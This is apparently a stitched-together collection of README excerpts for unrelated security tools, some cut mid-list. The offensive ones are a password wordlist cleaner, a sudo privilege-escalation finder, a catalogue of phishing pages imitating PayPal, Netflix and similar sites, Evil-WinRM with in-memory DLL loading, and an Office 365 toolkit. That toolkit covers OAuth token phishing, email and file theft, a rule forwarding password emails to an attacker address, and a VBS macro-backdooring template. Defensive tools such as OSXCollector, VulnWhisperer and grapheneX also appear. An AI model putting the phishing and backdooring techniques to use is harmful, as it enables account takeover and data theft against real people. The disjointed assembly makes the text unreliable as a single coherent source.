Remove short passwords& duplicates, change lowercase to uppercase & reverse, combine wordlists! Manual & explaination -d --dict Specifies the file you want to modify. This is the only parameter / argument that is not optional. -o --out The output filename (optional). Default is out.txt. -s --short This operation removes the lines with length shorter/equal to the specified number. Example: python dm.py -d dictionary.txt -s 5 <- This removes all lines with 5 or less characters of the file dictionary.txt -d --dupli This operation removes duplicate lines. If a line appears more than once, it gets removed. This is done so no password is tried more than once, since it is a waste of time. Example: python dm.py -d wordlist -d -l --lower This operation turns all upper-case letters to lower-case. Lower-case letters remain that way. Example: python dm.py --lower -d dictionary -u --upper This operation turns all lower-case letters to upper-case. upper-case letters remain that way. Example: python dm.py -u -d file.txt -j --join This operation joins two files together to great one larger file. Example: python dm.py -d wd1.txt -j wd2.txt <- The result is saved on the second wordlist (wd2.txt) -c --cut This operation removes all lines before the line number you specify. Useful if you have already used a large part of the wordlist and do not want to go through the same process. Example: python --cut rockyou.txt -o cutrocku.txt -e --exp This option shows this message. -a --arg This option shows the arguments & options.
If you like the project and for my personal motivation so as to develop other tools please a +1 star *
SUDO_KILLER SUDO_KILLER is a tool which help to abuse SUDO in different ways and with the main objective of performing a privilege escalation on linux environment. The tool helps to identify misconfiguration within sudo rules, vulnerability within the version of sudo being used (CVEs and vulns) and the used of dangerous binary, all of these could be abuse to elevate privilege to ROOT. SUDO_KILLER will then provide a list of commands or local exploits which could be exploited to elevate privilege. SUDO_KILLER does not perform any exploitation on your behalf, the exploitation will need to be performed manually and this is intended. Default usage Example: ./sudo_killer.sh -c -r report.txt -e /tmp/
Arguments -k : Keywords -e : export location (export /etc/sudoers) -c : include CVE checks with respect to sudo version -s : supply user password for sudo checks (not recommended ++except for CTF) -r : report name (save the output) -h : help
CVEs check To update the CVE database : run the following script ./cve_update.sh
IMPORTANT !!! If you need to input a password to run sudo -l then the script will not work if you don't provide a password with the argument -s. **NOTE : sudo_killer does not exploit automatically by itself, it was designed like this on purpose but check for misconguration and vulnerabilities and then propose you the following (if you are lucky the route to root is near!) :
a list of commands to exploit
a list of exploits
some description on how and why the attack could be performed
Why is it possible to run "sudo -l" without a password? By default, if the NOPASSWD tag is applied to any of the entries for a user on a host, he or she will be able to run "sudo -l" without a password. This behavior may be overridden via the verifypw and listpw options. However, these rules only affect the current user, so if user impersonation is possible (using su) sudo -l should be launched from this user as well. Sometimes the file /etc/sudoers can be read even if sudo -l is not accessible without password.
Testing the tool :) Will soon provide a docker to test the different scenarios :) ... Stay connected!
Traditional Twitch Login Page [ Login With Facebook Also Available ]
12) MICROSOFT PHISHING:
Traditional Microsoft-Live Web Login Page
13) STEAM PHISHING:
Traditional Steam Web Login Page
14) VK PHISHING:
Traditional VK Web Login Page
Advanced Poll Method
15) ICLOUD PHISHING:
Traditional iCloud Web Login Page
16) GitLab PHISHING:
Traditional GitLab Login Page
17) NetFlix PHISHING:
Traditional Netflix Login Page
18) Origin PHISHING:
Traditional Origin Login Page
19) Pinterest PHISHING:
Traditional Pinterest Login Page
20) Protonmail PHISHING:
Traditional Protonmail Login Page
21) Spotify PHISHING:
Traditional Spotify Login Page
22) Quora PHISHING:
Traditional Quora Login Page
23) PornHub PHISHING:
Traditional PornHub Login Page
24) Adobe PHISHING:
Traditional Adobe Login Page
25) Badoo PHISHING:
Traditional Badoo Login Page
26) CryptoCurrency PHISHING:
Traditional CryptoCurrency Login Page
27) DevianArt PHISHING:
Traditional DevianArt Login Page
28) DropBox PHISHING:
Traditional DropBox Login Page
29) eBay PHISHING:
Traditional eBay Login Page
30) MySpace PHISHING:
Traditional Myspace Login Page
31) PayPal PHISHING:
Traditional PayPal Login Page
32) Shopify PHISHING:
Traditional Shopify Login Page
33) Verizon PHISHING:
Traditional Verizon Login Page
34) Yandex PHISHING:
Traditional Yandex Login Page
Ascii error fix dpkg-reconfigure locales Then select: "All locales" Then select "en_US.UTF-8" After that reboot your machine. Then open terminal and run the command: "locale" There you will see "en_US.UTF-8" which is the default language. Instead of POSIX.
DISCLAIMER
TO BE USED FOR EDUCATIONAL PURPOSES ONLY
The use of the HiddenEye is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. Please read LICENSE.
Dockernymous is a start script for Docker that runs and configures two individual Linux containers in order act as a anonymisation workstation-gateway set up.
It's aimed towards experienced Linux/Docker users, security professionals and penetration testers!
The idea was to create a whonix-like setup (see https://www.whonix.org) that runs on systems which aren't able to efficiently run two hardware virtualized machines or don't have virtualization capacities at all.
Requirements: Host (Linux):
docker
vncviewer
xterm
curl
Gateway Image:
Linux (e.g. Alpine, Debian )
tor
procps
ncat
iptables
Workstation Image:
Linux (e.g. Kali)
xfce4 or another desktop environment (for vnc access)
tightvncserver
Instructions: 1. Host To clone the dockernymous repository type:
2. Gateway (Alpine): Get a lightweight gateway Image! For example Alpine:
docker pull alpine
Run the image, update the package list, install iptables & tor:
docker run -it alpine /bin/sh apk add --update tor iptables iproute2 exit
Feel free to further customize the gateway for your needs before you extit. To make this permanent you have to create a new image from the gateway container we just set up. Each time you run dockernymous a new container is created from that image and disposed on exit:
docker commit [Container ID] my_gateway
Get the container ID by running:
docker ps -a
3. Workstation (Kali Linux): Get an image for the Workstation. For example, Kali Linux for penetration testing:
As with the Gateway, to make this permanent you have to create an image from that customized container. Each time you run dockernymous a new container is created and disposed on exit.
$ docker commit [Container ID] my_workstation
Get the container ID by running:
$ docker ps -a
4. Run dockernymous In case you changed the names for the images to something different (defaults are: "docker_internal" (network), "my_gateway" (gateway), "my_workstation" (you guess it)) open dockernymous.sh with your favorite editor and update the actual names in the configuration section. Everything should be set up by now, let's give it a try! Run Dockernymus (don't forget to 'cd' into the cloned folder):
bash dockernymous.sh
or mark it executable once:
chmod +x dockernymous.sh
and always run it with:
./dockernymous.sh
I'm happy for feedback. Please remember that dockernymous is still under development. The script is pretty messy, yet so consider it as a alpha phased project (no versioning yet).
VulnWhisperer is a vulnerability management tool and report aggregator. VulnWhisperer will pull all the reports from the different Vulnerability scanners and create a file with a unique filename for each one, using that data later to sync with Jira and feed Logstash. Jira does a closed cycle full Sync with the data provided by the Scanners, while Logstash indexes and tags all of the information inside the report (see logstash files at /resources/elk6/pipeline/). Data is then shipped to ElasticSearch to be indexed and ends up in a visual and searchable format in Kibana with already defined dashboards.
(Optional) Use a python virtualenv to not mess with host python libraries
virtualenv venv (will create the python 2.7 virtualenv) source venv/bin/activate (start the virtualenv, now pip will run there and should install libraries without sudo)
deactivate (for quitting the virtualenv once you are done)
Install python libraries requirements
pip install -r /path/to/VulnWhisperer/requirements.txt cd /path/to/VulnWhisperer python setup.py install
(Optional) If using a proxy, add proxy URL as environment variable to PATH
Run To run, fill out the configuration file with your vulnerability scanner settings. Then you can execute from the command line.
(optional flag: -F -> provides "Fancy" log colouring, good for comprehension when manually executing VulnWhisperer) vuln_whisperer -c configs/frameworks_example.ini -s nessus or vuln_whisperer -c configs/frameworks_example.ini -s qualys
If no section is specified (e.g. -s nessus), vulnwhisperer will check on the config file for the modules that have the property enabled=true and run them sequentially.
Next you'll need to import the visualizations into Kibana and setup your logstash config. You can either follow the sample setup instructions [here](https://github.com/HASecuritySolutions/VulnWhisperer/wiki/Sample-Guide-ELK-Deployment) or go for the `docker-compose` solution we offer. Docker-compose ELK is a whole world by itself, and for newcomers to the platform, it requires basic Linux skills and usually a bit of troubleshooting until it is deployed and working as expected. As we are not able to provide support for each users ELK problems, we put together a docker-compose which includes:
VulnWhisperer
Logstash 6.6
ElasticSearch 6.6
Kibana 6.6
The docker-compose just requires specifying the paths where the VulnWhisperer data will be saved, and where the config files reside. If ran directly after git clone, with just adding the Scanner config to the VulnWhisperer config file (/resources/elk6/vulnwhisperer.ini), it will work out of the box. It also takes care to load the Kibana Dashboards and Visualizations automatically through the API, which needs to be done manually otherwise at Kibana's startup. For more info about the docker-compose, check on the docker-compose wiki or the FAQ.
Getting Started Our current Roadmap is as follows:
Create a Vulnerability Standard
Map every scanner results to the standard
Create Scanner module guidelines for easy integration of new scanners (consistency will allow #14)
Refactor the code to reuse functions and enable full compatibility among modules
Change Nessus CSV to JSON (Consistency and Fix #82)
Adapt single Logstash to standard and Kibana Dashboards
Implement Detectify Scanner
Implement Splunk Reporting/Dashboards
On top of this, we try to focus on fixing bugs as soon as possible, which might delay the development. We also very welcome PR's, and once we have the new standard implemented, it will be very easy to add compatibility with new scanners. The Vulnerability Standard will initially be a new simple one level JSON with all the information that matches from the different scanners having standardized variable names, while maintaining the rest of the variables as they are. In the future, once everything is implemented, we will evaluate moving to an existing standard like ECS or AWS Vulnerability Schema; we prioritize functionality over perfection.
AMIRA is a service for automatically running the analysis on the OSXCollector output files. The automated analysis is performed via OSXCollector Output Filters, in particular The One Filter to Rule Them All: the Analyze Filter. AMIRA takes care of retrieving the output files from an S3 bucket, running the Analyze Filter and then uploading the results of the analysis back to S3 (although one could envision as well attaching them to the related JIRA ticket).
Prerequisites
tox The following steps assume you have tox installed on your machine. If this is not the case, please run:
$ sudo pip install tox
OSXCollector Output Filters configuration file AMIRA uses OSXCollector Output Filters to do the actual analysis, so you will need to have a valid osxcollector.yaml configuration file in the working directory. The example configuration file can be found in the OSXCollector Output Filters. The configuration file mentions the location of the file hash and the domain blacklists. Make sure that the blacklist locations mentioned in the configuration file are also available when running AMIRA.
AWS credentials AMIRA uses boto to interface with AWS. You can supply the credentials using either of the possible boto config files. The credentials should allow reading and deleting SQS messages from the SQS queue specified in the AMIRA config as well as the read access to the objects in the S3 bucket where the OSXCollector output files are stored. To be able to upload the analysis results back to the S3 bucket specified in the AMIRA configuration file, the credentials should also allow write access to this bucket.
AMIRA Architecture The service uses the S3 bucket event notifications to trigger the analysis. You will need to configure an S3 bucket for the OSXCollector output files, so that when a file is added there the notification will be sent to an SQS queue (AmiraS3EventNotifications in the picture below). AMIRA periodically checks the queue for any new messages and upon receiving one it will fetch the OSXCollector output file from the S3 bucket. It will then run the Analyze Filter on the retrieved file. The Analyze Filter runs all the filters contained in the OSXCollector Output Filters package sequentially. Some of them communicate with the external resources, like domain and hashes blacklists (or whitelists) and threat intel APIs, e.g. VirusTotal, OpenDNS Investigate or ShadowServer. The original OSXCollector output is extended with all of this information and the very last filter run by the Analyze Filter summarizes all of the findings into a human-readable form. After the filter finishes running, the results of the analysis will be uploaded to the Analysis Results S3 bucket. The overview of the whole process and the system components involved in it are depicted below:
Using AMIRA The main entry point to AMIRA is in the amira/amira.py module. You will first need to create an instance of AMIRA class by providing the AWS region name, where the SQS queue with the event notifications for the OSXCollector output bucket is, and the SQS queue name:
To filter mac vendors, please check the number in mac_vendors.py. This last option can return unwanted devices, as it is based on the following unvalidated prefixes on my part:
Description & Purpose This shell is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators. This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.
If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown. To use IPv6, the address must be added to /etc/hosts.
upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
usage: upload local_path remote_path
download: it is not needed to set local_path if the remote file is in the current directory.
usage: download remote_path local_path
services: list all services. No administrator permissions needed.
menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.
To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions.
Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.
l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll")) The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.
Disclaimer & License This script is licensed under LGPLv3+. Direct link to License. Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.
o365-attack-toolkit allows operators to perform an OAuth phishing attack and later on use the Microsoft Graph API to extract interesting information. Some of the implemented features are :
Phishing endpoint The phishing endpoint is responsible for serving the HTML file that performs the OAuth token phishing.
Backend services Afterward, the token will be used by the backend services to perform the defined attacks.
Management interface The management interface can be utilized to inspect the extracted information from the Microsoft Graph API.
Features
Outlook Keyworded Extraction User emails can be extracted by this toolkit using keywords. For every defined keyword in the configuration file, all the emails that match them will be downloaded and saved in the database. The operator can inspect the downloaded emails through the management interface.
Onedrive/Sharepoint Keyworded Extraction Microsoft Graph API can be used to access files across OneDrive, OneDrive for Business and SharePoint document libraries. User files can be extracted by this toolkit using keywords. For every defined keyword in the configuration file, all the documents that match them will be downloaded and saved locally. The operator can examine the documents using the management interface.
Outlook Rules Creation Microsoft Graph API supports the creation of Outlook rules. You can define different rules by putting the rule JSON files in the rules/ folder. https://docs.microsoft.com/en-us/graph/api/mailfolder-post-messagerules?view=graph-rest-1.0&tabs=cs Below is an example rule that when loaded, it will forward every email that contains password in the body to attacker@example.com.
Word Document Macro Backdooring Users documents hosted on OneDrive can be backdoored by injecting macros. If this feature is enabled, the last 15 documents accessed by the user will be downloaded and backdoored with the macro defined in the configuration file. After the backdoored file has been uploaded, the extension of the document will be changed to .doc in order for the macro to be supported on Word. It should be noted that after backdooring the documents, they can not be edited online which increases the chances of our payload execution. This functionality can only be used on Windows because the insertion of macros is done using the Word COM object. A VBS file is built by the template below and executed so don't panic if you see wscript.exe running.
Dim wdApp Set wdApp = CreateObject("Word.Application") wdApp.Documents.Open("{DOCUMENT}") wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}" wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0 wdApp.Quit
How to set up
Compile
Dim wdApp Set wdApp = CreateObject("Word.Application") wdApp.Documents.Open("{DOCUMENT}") wdApp.Documents(1).VBProject.VBComponents("ThisDocument").CodeModule.AddFromFile "{MACRO}" wdApp.Documents(1).SaveAs2 "{OUTPUT}", 0 wdApp.Quit
Configuration An example configuration as below :
cd %GOPATH% git clone https://github.com/0x09AL/o365-attack-toolkit cd o365-attack-toolkit dep ensure go build
Deployment Before start using this toolkit you need to create an Application on the Azure Portal. Go to Azure Active Directory -> App Registrations -> Register an application.
After creating the application, copy the Application ID and change it on static/index.html. The URL(external listener) that will be used for phishing should be added as a Redirect URL. To add a redirect url, go the application and click Add a Redirect URL.
It should be noted that you can run this tool on any Operating Systems that Go supports, but the Macro Backdooring Functionality will only work on Windows. The look of the phishing page can be changed on static/index.html.
Security Considerations Apart from all the features this tool has, it also opens some attack surface on the host running the tool. Firstly, the Macro Backdooring Functionality will open the word files, and if you are running an unpatched version of Office, bad things can happen. Additionally, the extraction of files can download malicious files which will be saved on your computer. The best approach would be isolating the host properly and only allowing communication with the HTTPS redirector and Microsoft Graph API.
Management Interface The management interface allows the operator to browse the data that has been extracted.
In computing, hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, the removal of unnecessary software, unnecessary usernames or logins, and the disabling or removal of unnecessary services.
Although the current technology tries to design systems as safe as possible, security flaws and situations that can lead to vulnerabilities caused by unconscious use and missing configurations still exist. The user must be knowledgeable about the technical side of system architecture and should be aware of the importance of securing his/her system from vulnerabilities like this. Unfortunately, it's not possible to know all the details about hardening and necessary commands for every ordinary user and the hardening remains to be a technical issue due to the difficulty of understanding operating system internals. Therefore there are hardening checklists that contain various commands and rules of the specified operating system available such as trimstray/linux-hardening-checklist& Windows Server Hardening Checklist on the internet for providing a set of commands with their sections and of course simplifying the concept for the end user. But still, the user must know the commands and apply the hardening manually depending on the system. That's where the grapheneX exactly comes in play.
The project name is derived from the 'graphene'. Graphene is a one-atom-thick layer of carbon atoms arranged in a hexagonal lattice. In proportion to its thickness, it is about 100 times stronger than the strongest steel.
grapheneX project aims to provide a framework for securing the system with hardening commands automatically. It's designed for the end user as well as the Linux and Windows developers due to the interface options. (interactive shell/web interface) In addition to that, grapheneX can be used to secure a web server/application. Hardening commands and the scopes of those commands are referred to modules and the namespaces in the project. They exist at the modules.json file after installation. ($PYPATH/site-packages/graphenex/modules.json) Additionally, it's possible to add, edit or remove modules and namespaces. Also, the hardening operation can be automated with the presets that contain a list of modules. Currently, grapheneX support the hardening sections below. Each of these namespaces contains more than one module.
Firewall
User
Network
Services
Kernel
Filesystem
Other
Installation You can install grapheneX with pip. Usually this is the easiest way:
pip install graphenex
Also it's possible to run the setup.py for installation as follows:
python setup.py install
The commands below can be used for testing the project without installation:
cd grapheneX pipenv install pipenv run python -m graphenex
positional arguments: host:port host and port to run the web interface
optional arguments: -h, --help show this help message and exit -v, --version show version information -w, --web run the grapheneX web server --open open browser on web server start
Interactive Shell Execute the grapheneX.py in order to start the interactive shell.
Animated gifs and screenshots added for demonstration and include the test execution of the unversioned grapheneX. Use grapheneX or python -m graphenex command for the execution.
preset grapheneX has presets that contain particular modules for automating the hardening operation. Presets can be customized with the modules.json file and they can contain any supported module. preset command shows the available module presets and preset [PRESET] runs the hardening commands in a preset.
preset command supports autocomplete for preset names. Also, it supports an option for asking permission between each hardening command execution so that the user knows what he/she is doing.
Adding module presets
Presets are stored in the presets element inside the modules.json file. This JSON file can be edited for updating the presets.
grapheneX stores the modules and namespaces in modules.json file. It will show up as a new module when a new element is created in this JSON file. An example element is given below.
Choosing the remove option in the manage menu will be enough for removing the specified module. It's also possible to remove the module from modules.json manually.
Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.
Also create a empty text file called none.txt in the data folder, that way it doesn't do a subdomain brute when testing.
Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.
If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file.
Introduction Orbit is designed to explore network of a blockchain wallet by recursively crawling through transaction history. The data is rendered as a graph to reveal major sources, sinks and suspicious connections.
Orbit's default crawling depth is 3 i.e. it fetches the history of target wallet(s), crawls the newly found wallets and then crawls the wallets in the result again. The crawling depth can be increased or decresead with -d option.
Wallets that have made just a couple of interactions with our target may not be important, Orbit can be told to crawl top N wallets at each level by using the -t option.
Visualization Once the scan is complete, the graph will automatically open in your default browser. If it doesn't open, open quark.html manually. Don't worry if your graph looks messy like the one below or worse.
Select the Make Clusters option to form clusters using community detection algorithm. After that, you can use Color Clusters to give different colors to each community and then use Spacify option to fix overlapping nodes & edges.
The thickness of edges depends on the frequency of transactions between two wallets while the size of a node depends on both transaction frequency and the number of connections of the node. As Orbit uses Quark to render the graph, more information about the various features and controls is available in Quark's README.
This application and exercises will take you through some of the OWASP top 10 Vulnerabilities and how to prevent them.
Up and running
Install Docker for MacOS or Windows. You'll need to create a Docker account if you don't already have one.
git clone git://github.com/ScaleSec/vulnado
cd vulnado
docker-compose up
Open a browser and navigate to the client to make sure it's working: http://localhost:1337
Then back in your terminal verify you have connection to your API server: nc -vz localhost 8080
Architecture The docker network created by docker-compose maps pretty well to a multi-tier architecture where a web server is publicly available and there are other network resources like a database and internal site that are not publicly available.
OSXCollector is a forensic evidence collection & analysis toolkit for OSX.
Forensic Collection The collection script runs on a potentially infected machine and outputs a JSON file that describes the target machine. OSXCollector gathers information from plists, SQLite databases and the local file system. Forensic Analysis Armed with the forensic collection, an analyst can answer the question like:
Is this machine infected?
How'd that malware get there?
How can I prevent and detect further infection?
Yelp automates the analysis of most OSXCollector runs converting its output into an easily readable and actionable summary of just the suspicious stuff. Check out OSXCollector Output Filters project to learn how to make the most of the automated OSXCollector output analysis.
Performing Collection osxcollector.py is a single Python file that runs without any dependencies on a standard OSX machine. This makes it really easy to run collection on any machine - no fussing with brew, pip, config files, or environment variables. Just copy the single file onto the machine and run it: sudo osxcollector.py is all it takes.
$ sudo osxcollector.py Wrote 35394 lines. Output in osxcollect-2014_12_21-08_49_39.tar.gz
If you have just cloned the GitHub repository, osxcollector.py is inside osxcollector/ directory, so you need to run it as:
$ sudo osxcollector/osxcollector.py
IMPORTANT: please make sure that python command on your Mac OS X machine uses the default Python interpreter shipped with the system and is not overridden, e.g. by the Python version installed through brew. OSXCollector relies on a couple of native Python bindings for OS X libraries, which might be not available in other Python versions than the one originally installed on your system. Alternatively, you can run osxcollector.py explicitly specifying the Python version you would like to use:
The JSON output of the collector, along with some helpful files like system logs, has been bundled into a .tar.gz for hand-off to an analyst. osxcollector.py also has a lot of useful options to change how collection works:
-i INCIDENT_PREFIX/--id=INCIDENT_PREFIX: Sets an identifier which is used as the prefix of the output file. The default value is osxcollect.
$ sudo osxcollector.py -i IncontinentSealord Wrote 35394 lines. Output in IncontinentSealord-2014_12_21-08_49_39.tar.gz
Get creative with incident names, it makes it easier to laugh through the pain.
-p ROOTPATH/--path=ROOTPATH: Sets the path to the root of the filesystem to run collection on. The default value is /. This is great for running collection on the image of a disk.
$ sudo osxcollector.py -p '/mnt/powned'
-s SECTION/--section=SECTION: Runs only a portion of the full collection. Can be specified more than once. The full list of sections and subsections is:
-c/--collect-cookies: Collect cookies' value. By default OSXCollector does not dump the value of a cookie, as it may contain sensitive information (e.g. session id).
-l/--collect-local-storage: Collect the values stored in web browsers' local storage. By default OSXCollector does not dump the values as they may contain sensitive information.
-d/--debug: Enables verbose output and python breakpoints. If something is wrong with OSXCollector, try this.
$ sudo osxcollector.py -d
Details of Collection The collector outputs a .tar.gz containing all the collected artifacts. The archive contains a JSON file with the majority of information. Additionally, a set of useful logs from the target system logs are included.
Common Keys
Every Record Each line of the JSON file records 1 piece of information. There are some common keys that appear in every JSON record:
osxcollector_incident_id: A unique ID shared by every record.
osxcollector_section: The section or type of data this record holds.
osxcollector_subsection: The subsection or more detailed descriptor of the type of data this record holds.
File Records For records representing files there are a bunch of useful keys:
atime: The file accessed time.
ctime: The file creation time.
mtime: The file modified time.
file_path: The absolute path to the file.
md5: MD5 hash of the file contents.
sha1: SHA1 hash of the file contents.
sha2: SHA2 hash of the file contents.
For records representing downloaded files:
xattr-wherefrom: A list containing the source and referrer URLs for the downloaded file.
xattr-quarantines: A string describing which application downloaded the file.
SQLite Records For records representing a row of a SQLite database:
osxcollector_table_name: The table name the row comes from.
osxcollector_db_path: The absolute path to the SQLite file.
For records that represent data associated with a specific user:
osxcollector_username: The name of the user
Timestamps OSXCollector attempts to convert timestamps to human readable date/time strings in the format YYYY-mm-dd hh:MM:ss. It uses heuristics to automatically identify various timestamps:
seconds since epoch
milliseconds since epoch
seconds since 2001-01-01
seconds since 1601-01-01
Sections
version section The current version of OSXCollector.
system_info section Collects basic information about the system:
system name
node name
release
version
machine
kext section Collects the Kernel extensions from:
/System/Library/Extensions
/Library/Extensions
startup section Collects information about the LaunchAgents, LaunchDaemons, ScriptingAdditions, StartupItems and other login items from:
applications section Hashes installed applications and gathers install history from:
/Applications
~/Applications
/Library/Receipts/InstallHistory.plist
quarantines section Quarantines are basically the info necessary to show the 'Are you sure you wanna run this?' when a user is trying to open a file downloaded from the Internet. For some more details, checkout the Apple Support explanation of Quarantines: http://support.apple.com/kb/HT3662 This section collects also information from XProtect hash-based malware check for quarantines files. The plist is at: /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist XProtect also add minimum versions for Internet Plugins. That plist is at: /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.meta.plist
downloads section Hashes all users' downloaded files from:
mail section Hashes files in the mail app directories:
~/Library/Mail
~/Library/Mail Downloads
full_hash section Hashes all the files on disk. All of 'em. This does not run by default. It must be triggered with:
$ sudo osxcollector.py -s full_hash
Basic Manual Analysis Forensic analysis is a bit of art and a bit of science. Every analyst will see a bit of a different story when reading the output from OSXCollector. That's part of what makes analysis fun. Generally, collection is performed on a target machine because something is hinky: anti-virus found a file it doesn't like, deep packet inspect observed a callout, endpoint monitoring noticed a new startup item. The details of this initial alert - a file path, a timestamp, a hash, a domain, an IP, etc. - that's enough to get going.
Timestamps Simply greping a few minutes before and after a timestamp works great:
Automated Analysis The OSXCollector Output Filters project contains filters that process and transform the output of OSXCollector. The goal of filters is to make it easy to analyze OSXCollector output.
Development Tips The functionality of OSXCollector is stored in a single file: osxcollector.py. The collector should run on a naked install of OS X without any additional packages or dependencies. Ensure that all of the OSXCollector tests pass before editing the source code. You can run the tests using: make test After making changes to the source code, run make test again to verify that your changes did not break any of the tests.
A native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.
Introduction uncompyle6 translates Python bytecode back into equivalent Python source code. It accepts bytecodes from Python version 1.3 to version 3.8, spanning over 24 years of Python releases. We include Dropbox's Python 2.5 bytecode and some PyPy bytecode. Why this? Ok, I'll say it: this software is amazing. It is more than your normal hacky decompiler. Using compiler technology, the program creates a parse tree of the program from the instructions; nodes at the upper levels that look a little like what might come from a Python AST. So we can really classify and understand what's going on in sections of Python bytecode. Building on this, another thing that makes this different from other CPython bytecode decompilers is the ability to deparse just fragments of source code and give source-code information around a given bytecode offset. I use the tree fragments to deparse fragments of code at run time inside my trepandebuggers. For that, bytecode offsets are recorded and associated with fragments of the source code. This purpose, although compatible with the original intention, is yet a little bit different. See this for more information. Python fragment deparsing given an instruction offset is useful in showing stack traces and can be encorporated into any program that wants to show a location in more detail than just a line number at runtime. This code can be also used when source-code information does not exist and there is just bytecode. Again, my debuggers make use of this. There were (and still are) a number of decompyle, uncompyle, uncompyle2, uncompyle3 forks around. Almost all of them come basically from the same code base, and (almost?) all of them are no longer actively maintained. One was really good at decompiling Python 1.5-2.3 or so, another really good at Python 2.7, but that only. Another handles Python 3.2 only; another patched that and handled only 3.3. You get the idea. This code pulls all of these forks together and moves forward. There is some serious refactoring and cleanup in this code base over those old forks. This demonstrably does the best in decompiling Python across all Python versions. And even when there is another project that only provides decompilation for subset of Python versions, we generally do demonstrably better for those as well. How can we tell? By taking Python bytecode that comes distributed with that version of Python and decompiling these. Among those that successfully decompile, we can then make sure the resulting programs are syntactically correct by running the Python interpreter for that bytecode version. Finally, in cases where the program has a test for itself, we can run the check on the decompiled code. We are serious about testing, and use automated processes to find bugs. In the issue trackers for other decompilers, you will find a number of bugs we've found along the way. Very few to none of them are fixed in the other decompilers.
Requirements The code here can be run on Python versions 2.6 or later, PyPy 3-2.4, or PyPy-5.0.1. Python versions 2.4-2.7 are supported in the python-2.4 branch. The bytecode files it can read have been tested on Python bytecodes from versions 1.4, 2.1-2.7, and 3.0-3.8 and the above-mentioned PyPy versions.
Installation This uses setup.py, so it follows the standard Python routine:
pip install -e . # set up to run from source tree # Or if you want to install instead python setup.py install # may need sudo
A GNU makefile is also provided so make install (possibly as root or sudo) will do the steps above.
Running Tests
make check
A GNU makefile has been added to smooth over setting running the right command, and running tests from fastest to slowest. If you have remake installed, you can see the list of all tasks including tests via remake --tasks
Usage Run
$ uncompyle6 *compiled-python-file-pyc-or-pyo*
For usage help:
$ uncompyle6 -h
Verification In older versions of Python it was possible to verify bytecode by decompiling bytecode, and then compiling using the Python interpreter for that bytecode version. Having done this the bytecode produced could be compared with the original bytecode. However as Python's code generation got better, this no longer was feasible. If you want Python syntax verification of the correctness of the decompilation process, add the --syntax-verify option. However since Python syntax changes, you should use this option if the bytecode is the right bytecode for the Python interpreter that will be checking the syntax. You can also cross compare the results with another python decompiler like pycdc . Since they work differently, bugs here often aren't in that, and vice versa. There is an interesting class of these programs that is readily available give stronger verification: those programs that when run test themselves. Our test suite includes these. And Python comes with another a set of programs like this: its test suite for the standard library. We have some code in test/stdlib to facilitate this kind of checking too.
Known Bugs/Restrictions The biggest known and possibly fixable (but hard) problem has to do with handling control flow. (Python has probably the most diverse and screwy set of compound statements I've ever seen; there are "else" clauses on loops and try blocks that I suspect many programmers don't know about.) All of the Python decompilers that I have looked at have problems decompiling Python's control flow. In some cases we can detect an erroneous decompilation and report that. Python support is strongest in Python 2 for 2.7 and drops off as you get further away from that. Support is also probably pretty good for python 2.3-2.4 since a lot of the goodness of early the version of the decompiler from that era has been preserved (and Python compilation in that era was minimal) There is some work to do on the lower end Python versions which is more difficult for us to handle since we don't have a Python interpreter for versions 1.6, and 2.0. In the Python 3 series, Python support is is strongest around 3.4 or 3.3 and drops off as you move further away from those versions. Python 3.0 is weird in that it in some ways resembles 2.6 more than it does 3.1 or 2.7. Python 3.6 changes things drastically by using word codes rather than byte codes. As a result, the jump offset field in a jump instruction argument has been reduced. This makes the EXTENDED_ARG instructions are now more prevalent in jump instruction; previously they had been rare. Perhaps to compensate for the additional EXTENDED_ARG instructions, additional jump optimization has been added. So in sum handling control flow by ad hoc means as is currently done is worse. Between Python 3.5, 3.6 and 3.7 there have been major changes to the MAKE_FUNCTION and CALL_FUNCTION instructions. Currently not all Python magic numbers are supported. Specifically in some versions of Python, notably Python 3.6, the magic number has changes several times within a version. We support only released versions, not candidate versions. Note however that the magic of a released version is usually the same as the last candidate version prior to release. There are also customized Python interpreters, notably Dropbox, which use their own magic and encrypt bytcode. With the exception of the Dropbox's old Python 2.5 interpreter this kind of thing is not handled. We also don't handle PJOrion obfuscated code. For that try: PJOrion Deobfuscator to unscramble the bytecode to get valid bytecode before trying this tool. This program can't decompile Microsoft Windows EXE files created by Py2EXE, although we can probably decompile the code after you extract the bytecode properly. For situations like this, you might want to consider a decompilation service like Crazy Compilers. 